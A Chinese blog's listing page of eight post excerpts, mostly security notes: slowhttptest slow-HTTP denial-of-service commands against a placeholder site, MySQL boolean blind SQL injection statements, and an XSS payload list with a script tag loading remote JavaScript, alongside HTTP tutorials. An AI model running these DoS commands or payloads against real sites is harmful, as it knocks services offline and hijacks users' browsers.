- 博客(8)
- 收藏
- 关注
原创 slowhttptest 慢速攻击
apt-get install slowhttptest slowhttptest -hslowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://www.xxx.com/index.html -x 24 -p 3slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 819...
2018-10-12 16:35:31 1198
原创 kali 搜狗输入法
1.搜狗1).首先修改依赖源deb http://cn.archive.ubuntu.com/ubuntu/ trusty main restricted universe multiversedeb http://cn.archive.ubuntu.com/ubuntu/ trusty-security main restricted universe multiversedeb htt...
2018-10-09 14:07:19 398
转载 HTTP 学习指南
前言关于计算机网络,HTTP网络通信协议在任何的开发工作中都非常重要 今天,我将献上一份HTTP的学习指南,希望你们会喜欢目录1. 储备知识讲解HTPP协议前,先了解一些基础的计算机网络相关知识1.1 计算机网络体系结构 定义 计算机网络的各层 + 其协议的集合 作用 定义该计算机网络的所能完成的功能 结构介绍 计算机网络体系结构分为3...
2018-10-04 17:56:37 133
转载 HTTP307状态码
301永久重定向302临时重定向,HTTP1.0的状态码,HTTP1.1也有保留。 如果client向server发送post请求。 server返回URL和302。 如果用户确认,client发送post请求。(但实际情况是,很多浏览器都不问问用户,直接变为get发送get请求)303临时重定向,HTTP1.1的状态码// 发送Post请求,收到303,直接重定向为get,发送g...
2018-10-04 17:56:28 3262
转载 HTTP协议的请求方法
前言:从来没想过要写关于http协议请求方式的,可是今天遇到一位同事,竟然对HTTP的请求方式一点都不了解,所以决定总结一下,也记录一下。 HTTP协议 (Hyper Text Transfer Protocol)HTTP是一个基于TCP/IP通信协议来传递数据,包括html文件、图像、结果等,即是一个客户端和服务器端请求和应答的标准。 HTTP协议特点1.http无连接:...
2018-10-04 17:56:22 756 1
转载 MySQL基于布尔型盲注常用语句
什么是盲注?基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。常用语句汇总查询所有数据库1.判断表存不存在 1 and exists(select ...
2018-10-04 17:55:51 2439
原创 百个XSS-payload注入汇总
(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javasc...
2018-10-04 17:55:30 3567 1
转载 慢DOS-slowhttp介绍与测试
slowhttp:slowhttptest包括slowloris, Slow HTTP POST, Slow Read attack等。原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源,达到攻击目的。slowhttp攻击不像ddos那么直接通过大量连接(请求)搞崩溃服务器,它折磨死服务器,让服务器感觉各种不自在,感觉像生病了一样,然后慢慢死去(业务无法正常运行)。sl...
2018-10-04 17:53:40 243
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人